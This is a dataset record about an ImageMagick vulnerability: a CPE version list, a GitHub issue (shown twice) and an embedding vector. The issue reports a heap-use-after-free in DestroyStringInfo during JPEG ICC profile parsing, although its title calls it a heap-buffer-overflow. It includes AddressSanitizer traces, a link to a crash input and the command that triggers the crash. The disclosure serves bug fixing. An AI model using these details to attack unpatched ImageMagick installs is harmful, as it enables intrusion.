[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "FB264CB7-AFF2-45C4-A12E-9C65BD7DDD76", "versionEndExcluding": "6.9.10-55", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "6B173DFB-D070-44D6-BE3F-772BF990E3A9", "versionEndExcluding": "7.0.8-55", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1641
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/string.c:853 in DestroyStringInfo. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://github.com/007Alice/crashes/raw/master/ImageMagick_crash_0) run command: ./magick convert poc /dev/null ``` ==29840==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000af68 at pc 0x7f9e79581fab bp 0x7fff303409f0 sp 0x7fff303409e0 READ of size 8 at 0x60400000af68 thread T0 #0 0x7f9e79581faa in DestroyStringInfo MagickCore/string.c:853 #1 0x7f9e7985ebaf in ReadJPEGImage coders/jpeg.c:1198 #2 0x7f9e7929dbba in ReadImage MagickCore/constitute.c:547 #3 0x7f9e7929fde0 in ReadImages MagickCore/constitute.c:917 #4 0x7f9e78aab965 in ConvertImageCommand MagickWand/convert.c:617 #5 0x7f9e78c3d9a6 in MagickCommandGenesis MagickWand/mogrify.c:185 #6 0x4017d1 in MagickMain utilities/magick.c:149 #7 0x4019b2 in main utilities/magick.c:180 #8 0x7f9e783c982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x4012e8 in _start (/home/ImageMagick/utilities/.libs/lt-magick+0x4012e8) 0x60400000af68 is located 24 bytes inside of 40-byte region [0x60400000af50,0x60400000af78) freed by thread T0 here: #0 0x7f9e79ed42ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f9e7945cfac in RelinquishMagickMemory MagickCore/memory.c:1074 #2 0x7f9e7958216e in DestroyStringInfo MagickCore/string.c:862 #3 0x7f9e7985b93c in ReadICCProfile coders/jpeg.c:570 #4 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) previously allocated by thread T0 here: #0 0x7f9e79ed4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f9e7945c056 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x7f9e7957fb60 in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x7f9e7957ff57 in AcquireStringInfoContainer MagickCore/string.c:181 #4 0x7f9e7958029d in BlobToStringInfo MagickCore/string.c:236 #5 0x7f9e7985b7ec in ReadICCProfile coders/jpeg.c:549 #6 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 #4 0x7f9e78aab965 in ConvertImageCommand MagickWand/convert.c:617 #5 0x7f9e78c3d9a6 in MagickCommandGenesis MagickWand/mogrify.c:185 #6 0x4017d1 in MagickMain utilities/magick.c:149 #7 0x4019b2 in main utilities/magick.c:180 #8 0x7f9e783c982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x4012e8 in _start (/home/ImageMagick/utilities/.libs/lt-magick+0x4012e8) 0x60400000af68 is located 24 bytes inside of 40-byte region [0x60400000af50,0x60400000af78) freed by thread T0 here: #0 0x7f9e79ed42ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f9e7945cfac in RelinquishMagickMemory MagickCore/memory.c:1074 #2 0x7f9e7958216e in DestroyStringInfo MagickCore/string.c:862 #3 0x7f9e7985b93c in ReadICCProfile coders/jpeg.c:570 #4 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) previously allocated by thread T0 here: #0 0x7f9e79ed4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f9e7945c056 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x7f9e7957fb60 in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x7f9e7957ff57 in AcquireStringInfoContainer MagickCore/string.c:181 #4 0x7f9e7958029d in BlobToStringInfo MagickCore/string.c:236 #5 0x7f9e7985b7ec in ReadICCProfile coders/jpeg.c:549 #6 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9620: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 fa 0x0c087fff9630: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==29840==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-54 Q16 x86_64 2019-07-18 https://imagemagick.org Copyright: © 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.0) Delegates (built-in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/string.c:853 in DestroyStringInfo
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1641/comments
2
2019-07-18T09:43:55
2020-01-15T10:53:24Z
https://github.com/ImageMagick/ImageMagick/issues/1641
469,671,879
1,641
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow at MagickCore/string.c:853 in DestroyStringInfo Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/string.c:853 in DestroyStringInfo. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://github.com/007Alice/crashes/raw/master/ImageMagick_crash_0) run command: ./magick convert poc /dev/null ``` ==29840==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000af68 at pc 0x7f9e79581fab bp 0x7fff303409f0 sp 0x7fff303409e0 READ of size 8 at 0x60400000af68 thread T0 #0 0x7f9e79581faa in DestroyStringInfo MagickCore/string.c:853 #1 0x7f9e7985ebaf in ReadJPEGImage coders/jpeg.c:1198 #2 0x7f9e7929dbba in ReadImage MagickCore/constitute.c:547 #3 0x7f9e7929fde0 in ReadImages MagickCore/constitute.c:917 #4 0x7f9e78aab965 in ConvertImageCommand MagickWand/convert.c:617 #5 0x7f9e78c3d9a6 in MagickCommandGenesis MagickWand/mogrify.c:185 #6 0x4017d1 in MagickMain utilities/magick.c:149 #7 0x4019b2 in main utilities/magick.c:180 #8 0x7f9e783c982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x4012e8 in _start (/home/ImageMagick/utilities/.libs/lt-magick+0x4012e8) 0x60400000af68 is located 24 bytes inside of 40-byte region [0x60400000af50,0x60400000af78) freed by thread T0 here: #0 0x7f9e79ed42ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f9e7945cfac in RelinquishMagickMemory MagickCore/memory.c:1074 #2 0x7f9e7958216e in DestroyStringInfo MagickCore/string.c:862 #3 0x7f9e7985b93c in ReadICCProfile coders/jpeg.c:570 #4 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) previously allocated by thread T0 here: #0 0x7f9e79ed4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f9e7945c056 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x7f9e7957fb60 in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x7f9e7957ff57 in AcquireStringInfoContainer MagickCore/string.c:181 #4 0x7f9e7958029d in BlobToStringInfo MagickCore/string.c:236 #5 0x7f9e7985b7ec in ReadICCProfile coders/jpeg.c:549 #6 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 #4 0x7f9e78aab965 in ConvertImageCommand MagickWand/convert.c:617 #5 0x7f9e78c3d9a6 in MagickCommandGenesis MagickWand/mogrify.c:185 #6 0x4017d1 in MagickMain utilities/magick.c:149 #7 0x4019b2 in main utilities/magick.c:180 #8 0x7f9e783c982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x4012e8 in _start (/home/ImageMagick/utilities/.libs/lt-magick+0x4012e8) 0x60400000af68 is located 24 bytes inside of 40-byte region [0x60400000af50,0x60400000af78) freed by thread T0 here: #0 0x7f9e79ed42ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f9e7945cfac in RelinquishMagickMemory MagickCore/memory.c:1074 #2 0x7f9e7958216e in DestroyStringInfo MagickCore/string.c:862 #3 0x7f9e7985b93c in ReadICCProfile coders/jpeg.c:570 #4 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) previously allocated by thread T0 here: #0 0x7f9e79ed4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f9e7945c056 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x7f9e7957fb60 in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x7f9e7957ff57 in AcquireStringInfoContainer MagickCore/string.c:181 #4 0x7f9e7958029d in BlobToStringInfo MagickCore/string.c:236 #5 0x7f9e7985b7ec in ReadICCProfile coders/jpeg.c:549 #6 0x7f9e77373954 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x20954) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/string.c:853 DestroyStringInfo Shadow bytes around the buggy address: 0x0c087fff9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff95e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa 0x0c087fff95f0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff9600: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9610: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 05 0x0c087fff9620: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 00 fa 0x0c087fff9630: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==29840==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-54 Q16 x86_64 2019-07-18 https://imagemagick.org Copyright: © 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.0) Delegates (built-in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
8,128
[ -0.023595988750457764, 0.009608274325728416, -0.008836806751787663, 0.014805937185883522, 0.034225091338157654, 0.015592989511787891, -0.0280845258384943, 0.030391134321689606, -0.01489165611565113, 0.03996044397354126, -0.010099207982420921, 0.01055897120386362, 0.017112545669078827, 0.015865730121731758, 0.005065189208835363, 0.0017104754224419594, -0.033071789890527725, 0.022084224969148636, -0.03126390650868416, -0.016161849722266197, 0.014011092483997345, -0.017611272633075714, -0.0485946461558342, 0.036251168698072433, -0.008774465881288052, 0.027461117133498192, -0.012818824499845505, 0.015865730121731758, 0.016535894945263863, 0.01801648736000061, 0.017938561737537384, 0.011275890283286572, -0.009725162759423256, 0.040240976959466934, 0.05694831162691116, -0.003183276392519474, 0.02861442230641842, 0.10024398565292358, -0.004387232940644026, 0.028785858303308487, 0.0006779560935683548, -0.046880271285772324, -0.008914732374250889, 0.02733643539249897, -0.01840611733496189, 0.007289975881576538, -0.006128878798335791, -0.025793500244617462, -0.045010048896074295, 0.03257306292653084, 0.01968410424888134, -0.003985913936048746, -0.015522856265306473, -0.04382557421922684, 0.005205455701798201, -0.03397572785615921, 0.003761876840144396, 0.0204633641988039, 0.009514763019979, 0.011704483069479465, -0.018795747309923172, 0.030032673850655556, 0.010177133604884148, 0.027289679273962975, 0.006849694065749645, -0.018452873453497887, 0.016130678355693817, 0.0041885217651724815, -0.00041227717883884907, 0.005037914961576462, -0.021928371861577034, -0.009140717796981335, 0.01670733094215393, 0.0020397126208990812, 0.020588045939803123, 0.00903941411525011, 0.027087071910500526, 0.017502175644040108, -0.034879669547080994, 0.0340692400932312, -0.03182497248053551, 0.022769972681999207, -0.04077087715268135, 0.03544073924422264, 0.02629222720861435, 0.0033956249244511127, -0.045664627104997635, -0.07007104903459549, -0.01167331263422966, -0.015616367571055889, -0.0018828866304829717, 0.011494082398712635, 0.0161150936037302, -0.014798144809901714, -0.02197512798011303, 0.022614121437072754, -0.008244569413363934, -0.004885959438979626, -0.06327590346336365, -0.012834410183131695, -0.020260756835341454, -0.012281135655939579, -0.028240377083420753, 0.009312155656516552, -0.01469684112817049, 0.006047056522220373, -0.019029526039958, -0.02644808031618595, 0.01778271049261093, 0.13353396952152252, 0.012811032123863697, -0.014525403268635273, -0.005026225931942463, 0.02164783887565136, 0.0037755139637738466, 0.002014386700466275, 0.015031922608613968, 0.005770419258624315, -0.03011060133576393, -0.011470705270767212, -0.016302116215229034, -0.03946172073483467, 0.0019189274171367288, 0.008571858517825603, -0.031217150390148163, 0.030297623947262764, -0.015063093043863773, -0.030562572181224823, -0.01204735692590475, 0.0052093518897891045, -0.030266452580690384, -0.02998591959476471, 0.0071497089229524136, -0.017611272633075714, -0.010013489052653313, -0.0007729283533990383, -0.03159119561314583, 0.06626825779676437, -0.00832249503582716, 0.01213307585567236, -0.0689489096403122, -0.025653233751654625, 0.0029884616378694773, 0.009101754985749722, -0.020354267209768295, 0.024531099945306778, -0.00970957800745964, -0.012405816465616226, 0.004811929538846016, -0.016161849722266197, -0.01742425002157688, -0.0027254612650722265, 0.011112245731055737, 0.010979771614074707, 0.05529627948999405, -0.011361608281731606, 0.01239023171365261, 0.05744703486561775, -0.026042863726615906, -0.014922826550900936, -0.04669325053691864, -0.0366252139210701, -0.005548330023884773, -0.037653837352991104, -0.0017874272307381034, -0.028785858303308487, 0.010769370943307877, -0.002203357173129916, 0.004679455421864986, 0.03385104984045029, 0.001941331080161035, 0.004893751814961433, 0.008719917386770248, -0.005809382069855928, -0.06053290516138077, 0.00433268491178751, -0.0004909337149001658, 0.0069977534003555775, -0.015179981477558613, -0.02576233074069023, -0.029253415763378143, 0.006070434115827084, -0.001678330940194428, -0.016847597435116768, 0.042921632528305054, -0.0007724413299001753, -0.008867977187037468, -0.002893002238124609, 0.012795446440577507, -0.007726361509412527, 0.011049904860556126, -0.012561668641865253, 0.02155432663857937, -0.03148209676146507, 0.0402098074555397, 0.00541195971891284, -0.025154508650302887, -0.022816728800535202, 0.01563195325434208, -0.021959543228149414, 0.022380342707037926, -0.024141469970345497, -0.04725431650876999, -0.010551178827881813, 0.01350457314401865, 0.0170346200466156, -0.01929447427392006, 0.012296720407903194, 0.013224040158092976, -0.005891204345971346, -0.017548931762576103, -0.01706579141318798, 0.035721272230148315, 0.018686652183532715, -0.032386038452386856, 0.0064483750611543655, -0.008704332634806633, 0.005178181920200586, -0.028754688799381256, 0.01429162546992302, 0.015639744699001312, -0.013317550532519817, -0.02007373422384262, -0.037653837352991104, -0.04525941237807274, -0.034287434071302414, -0.01553064864128828, 0.002014386700466275, -0.04080204665660858, 0.009468006901443005, 0.027741650119423866, -0.02325311489403248, 0.0027916983235627413, 0.007866628468036652, 0.018499629572033882, -0.0128655806183815, -0.0032261358574032784, -0.006958790589123964, -0.020354267209768295, 0.019606178626418114, 0.018624311313033104, 0.03849543631076813, -0.012296720407903194, -0.012834410183131695, 0.025388285517692566, 0.04064619541168213, -0.009764125570654869, -0.01219541672617197, -0.00701333861798048, 0.03185614198446274, 0.008073132485151291, -0.020478948950767517, 0.023066092282533646, -0.011392778716981411, -0.0027897502295672894, -0.001892627333290875, 0.002680653939023614, -0.009000451304018497, -0.01128368265926838, -0.01926330290734768, 0.03353934362530708, 0.006483442150056362, -0.020915335044264793, 0.02177252061665058, 0.011953846551477909, 0.010379740968346596, -0.002891054144129157, 0.006549679208546877, -0.012701936066150665, -0.017206057906150818, 0.05454818904399872, -0.01765802875161171, -0.02191278710961342, -0.04712963476777077, -0.037061598151922226, 0.0007704931776970625, 0.010449874214828014, 0.0118681276217103, 0.022380342707037926, -0.01772036962211132, 0.0014835159527137876, 0.013730558566749096, -0.03011060133576393, 0.02531035989522934, 0.006148360203951597, 0.008790051564574242, 0.026790954172611237, -0.000013880566257284954, -0.030718423426151276, -0.02459344081580639, -0.012218794785439968, 0.004640492610633373, -0.036344680935144424, 0.0035417359322309494, 0.020619215443730354, 0.01736190915107727, -0.021928371861577034, -0.008867977187037468, -0.03597063571214676, 0.004383336752653122, -0.008151058107614517, -0.02697797678411007, 0.0025520760100334883, 0.027539042755961418, -0.02089974842965603, -0.00010623503476381302, -0.03347700461745262, 0.030282037332654, 0.0014611121732741594, -0.02259853482246399, 0.02858325093984604, -0.030562572181224823, -0.006011989898979664, -0.016395626589655876, -0.04871932417154312, -0.004648284986615181, 0.009506970643997192, -0.011977223679423332, 0.008112095296382904, 0.015951449051499367, -0.012935713864862919, -0.015974827110767365, -0.02629222720861435, 0.02397003397345543, 0.021850446239113808, 0.010644689202308655, -0.02736760675907135, 0.04594516009092331, -0.08609262853860855, 0.021336134523153305, -0.00701333861798048, -0.026198716834187508, -0.004956092685461044, -0.020650386810302734, 0.0058600339107215405, -0.03946172073483467, -0.03737330436706543, 0.019995808601379395, 0.026931220665574074, 0.010816127061843872, -0.02543504163622856, 0.005244418978691101, 0.006635397672653198, -0.03444328531622887, 0.020291926339268684, -0.001865353318862617, -0.0066198124550282955, 0.009031621739268303, 0.027850747108459473, -0.013348720967769623, 0.0015234530437737703, 0.05523393675684929, -0.015585197135806084, 0.03322764113545418, 0.014626707881689072, -0.012031772173941135, -0.01147849764674902, 0.014844899997115135, 0.00564184132963419, -0.02968979999423027, 0.014728011563420296, -0.03643818944692612, -0.016177434474229813, -0.020120488479733467, 0.013683803379535675, 0.014533196575939655, 0.0020436090417206287, -0.023720670491456985, -0.009374495595693588, -0.005462611559778452, -0.022551780566573143, 0.04183067008852959, -0.04924922436475754, 0.019247718155384064, -0.047597192227840424, -0.03656287118792534, 0.043077483773231506, -0.022442683577537537, -0.033757537603378296, 0.004843099974095821, 0.0032124987337738276, 0.010504422709345818, 0.04479185491800308, -0.03746681287884712, 0.013301965780556202, 0.026198716834187508, -0.013816277496516705, 0.02194395661354065, 0.016161849722266197, -0.03681223466992378, -0.04201769083738327, 0.048189427703619, -0.032978277653455734, -0.062465470284223557, -0.01723722741007805, 0.05722884461283684, 0.016161849722266197, -0.025949353352189064, 0.02527919039130211, -0.032978277653455734, -0.0003009891079273075, -0.01055897120386362, 0.023331040516495705, 0.016754087060689926, 0.004262551199644804, 0.02834947407245636, 0.015359211713075638, -0.010449874214828014, 0.033570513129234314, -0.0011055748909711838, 0.033664025366306305, -0.0034384841565042734, -0.04117609187960625, 0.005536641459912062, 0.015133226290345192, 0.012359061278402805, 0.02043219283223152, -0.009140717796981335, -0.01384744793176651, -0.0005542485741898417, -0.01745542138814926, 0.0006331486511044204, -0.0108706746250391, 0.07823769003152847, 0.005688596982508898, 0.015561819076538086, -0.02376742474734783, 0.0113304378464818, 0.013418854214251041, -0.034380946308374405, -0.012678558006882668, -0.0012682453962042928, -0.00886018481105566, 0.013029225170612335, -0.025559723377227783, -0.039025332778692245, -0.026806538924574852, -0.04516590014100075, -0.017798295244574547, -0.005521056242287159, -0.0007539339130744338, 0.026370152831077576, -0.003181328298524022, -0.024702537804841995, -0.023798596113920212, -0.015561819076538086, -0.006717219948768616, -0.0017611272633075714, 0.01697227917611599, -0.02272321656346321, -0.030827520415186882, 0.02292582578957081, -0.003685899078845978, -0.018982769921422005, 0.033040616661310196, 0.012842202559113503, -0.03269774466753006, -0.02242709882557392, 0.01664499007165432, 0.003592388005927205, 0.006650982890278101, 0.013730558566749096, -0.027024731040000916, -0.020198415964841843, 0.00879784394055605, 0.028193620964884758, 0.038994163274765015, 0.002318297978490591, -0.003989810589700937, -0.018515214323997498, 0.012312306091189384, 0.03924352675676346, 0.038931820541620255, 0.0014172788942232728, -0.010371948592364788, 0.028661176562309265, 0.0057548340409994125, 0.01271752081811428, 0.015211151912808418, -0.032354868948459625, 0.005973026622086763, -0.024499930441379547, -0.03171587735414505, -0.012577254325151443, 0.04448015242815018, -0.0072627016343176365, -0.01237464603036642, -0.0018595088040456176, -0.02775723673403263, 0.026245471090078354, 0.020260756835341454, 0.024858389049768448, -0.03812139108777046, 0.0018731459276750684, -0.005626256112009287, 0.025949353352189064, -0.030141770839691162, -0.015624159947037697, 0.03787202760577202, 0.023424550890922546, 0.015109848231077194, -0.01840611733496189, 0.027523458003997803, -0.0037384992465376854, 0.043638553470373154, -0.060938119888305664, -0.057665228843688965, 0.028552081435918808, -0.007582198362797499, -0.019481496885418892, 0.027803990989923477, -0.03347700461745262, -0.0034384841565042734, -0.04067736491560936, -0.004578151740133762, -0.018000902608036995, 0.024219395592808723, 0.00468335160985589, 0.023549232631921768, 0.008821221999824047, -0.0025579205248504877, -0.011252512224018574, 0.014260455034673214, 0.03093661554157734, 0.028520910069346428, 0.01265517994761467, 0.02468695305287838, -0.00033264653757214546, -0.005544433835893869, -0.03983576223254204, 0.033632855862379074, 0.010317400097846985, -0.008228983730077744, 0.04049034044146538, 0.004819722380489111, 0.01863989606499672, -0.02471812255680561, 0.00019250153854954988, -0.028848199173808098, -0.014953996986150742, 0.0010568711441010237, 0.04529058188199997, -0.04463600367307663, -0.009140717796981335, -0.019995808601379395, 0.03328998014330864, -0.017486590892076492, 0.02877027355134487, 0.00781597662717104, -0.028100110590457916, 0.011860335245728493, -0.015429344959557056, 0.013294173404574394, 0.0016189123271033168, -0.012546083889901638, 0.013722766190767288, 0.0017124235164374113, 0.01890484429895878, 0.0038398029282689095, 0.012242171913385391, 0.006654879078269005, 0.004044358618557453, 0.014120188541710377, 0.021866030991077423, -0.0032748396042734385, -0.02075948193669319, 0.016489138826727867, 0.007621161174029112, -0.04578930884599686, -0.008571858517825603, 0.02590259723365307, -0.014034469611942768, -0.0011367453262209892, -0.025029826909303665, -0.002692342735826969, 0.004691144451498985, -0.0038495436310768127, -0.004636595956981182, -0.004387232940644026, -0.016489138826727867, 0.02206863835453987, -0.011244719848036766, -0.009584896266460419, 0.008080924861133099, 0.02305050566792488, -0.01147849764674902, 0.008766673505306244, 0.010068037547171116, -0.009421251714229584, -0.0188736729323864, 0.02537270076572895, 0.0094368364661932, 0.00308197271078825, 0.008634199388325214, 0.0013062342768535018, 